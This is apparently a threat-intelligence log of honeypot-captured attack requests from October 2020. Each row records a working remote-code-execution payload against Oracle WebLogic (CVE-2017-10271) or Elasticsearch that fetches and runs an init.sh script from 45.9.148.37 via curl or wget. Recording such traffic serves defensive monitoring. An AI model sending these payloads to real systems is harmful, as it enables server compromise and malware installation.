internetweather

Payload: 45.9.148.37

Oct 27th, 2020
  1. Source IP, Country, User Agent, Payload, POST Data, Target Port, Bad Packets® Tags, Date First Seen, Date Last Seen, Event Count
  2. 123.56.107.140 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T16:16:37Z 2020-10-27T16:16:37Z 1
  3. 122.51.241.15 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-27T12:27:48Z 2020-10-27T12:27:48Z 1
  4. 122.51.241.15 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T12:27:47Z 2020-10-27T12:27:47Z 1
  5. 120.78.2.189 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:47:56Z 2020-10-27T06:47:56Z 1
  6. 120.78.2.189 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:47:53Z 2020-10-27T06:47:53Z 1
  7. 212.129.153.225 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-27T06:45:45Z 2020-10-27T06:45:45Z 1
  8. 212.129.153.225 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-27T06:45:42Z 2020-10-27T06:45:42Z 1
  9. 67.216.214.51 United States Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-26T06:36:10Z 2020-10-26T06:36:10Z 1
  10. 119.3.184.210 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/b2f628fff19fda999999999/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-25T00:41:05Z 2020-10-25T00:41:05Z 1
  11. 119.3.184.210 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cd1 -fsSL http://45.9.148.37/b2f628fff19fda999999999/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-25T00:41:03Z 2020-10-25T00:41:03Z 1
  12. 119.45.11.28 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-24T05:06:43Z 2020-10-24T05:06:43Z 1
  13. 103.26.77.84 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-23T21:30:46Z 2020-10-23T21:30:46Z 1
  14. 103.26.77.84 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-23T21:30:46Z 2020-10-23T21:30:46Z 1
  15. 39.107.138.233 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-22T20:27:46Z 2020-10-22T20:27:46Z 1
  16. 106.12.21.27 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-22T11:37:09Z 2020-10-22T11:37:09Z 1
  17. 139.155.41.161 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T12:37:31Z 2020-10-21T12:37:31Z 1
  18. 139.155.41.161 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T12:37:28Z 2020-10-21T12:37:28Z 1
  19. 45.79.50.100 United States Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-21T07:01:27Z 2020-10-21T07:01:27Z 1
  20. 45.79.50.100 United States Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-21T07:01:26Z 2020-10-21T07:01:26Z 1
  21. 153.126.180.38 Japan Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T22:55:58Z 2020-10-20T22:55:58Z 1
  22. 153.126.180.38 Japan Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-20T22:55:54Z 2020-10-20T22:55:54Z 1
  23. 39.99.129.254 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T12:51:11Z 2020-10-20T12:51:11Z 1
  24. 120.53.124.104 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-20T04:35:05Z 2020-10-20T04:35:05Z 1
  25. 120.53.124.104 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-20T04:35:00Z 2020-10-20T04:35:00Z 1
  26. 202.120.164.93 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T19:35:27Z 2020-10-19T19:35:27Z 1
  27. 202.120.164.93 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T19:35:15Z 2020-10-19T19:35:15Z 1
  28. 111.231.207.163 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T18:57:05Z 2020-10-19T18:57:05Z 1
  29. 111.231.207.163 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:57:01Z 2020-10-19T18:57:01Z 1
  30. 47.94.230.59 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7002 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:17:35Z 2020-10-19T18:17:35Z 1
  31. 47.94.230.59 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T18:17:34Z 2020-10-19T18:17:34Z 1
  32. 47.105.217.49 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T17:20:40Z 2020-10-19T17:20:40Z 1
  33. 42.194.142.186 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T17:08:23Z 2020-10-19T17:08:23Z 1
  34. 42.194.142.186 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T17:08:14Z 2020-10-19T17:08:14Z 1
  35. 183.57.157.106 China Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 "<soapenv:Envelope xmlns:soapenv=\x22http://schemas.xmlsoap.org/soap/envelope/\x22><soapenv:Header><work:WorkContext xmlns:work=\x22http://bea.com/2004/06/soap/workarea/\x22><java version=\x221.8.0_131\x22 class=\x22java.beans.XMLDecoder\x22><void class=\x22java.lang.ProcessBuilder\x22><array class=\x22java.lang.String\x22 length=\x223\x22><void index=\x220\x22><string>/bin/bash</string></void><void index=\x221\x22><string>-c</string></void><void index=\x222\x22><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=\x22start\x22/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>" 7001 Oracle WebLogic RCE | Platform | CVE-2017-10271 2020-10-19T16:58:00Z 2020-10-19T16:58:00Z 1
  36. 120.53.229.36 China Go-http-client/1.1 POST /_search?pretty HTTP/1.1 "{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22wget http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh -P /tmp/sssooo\x5C\x22).getText()\x22}}}" 9200 Elasticsearch Targeted | Platform | - 2020-10-19T16:17:34Z 2020-10-19T16:17:34Z 1
  37.  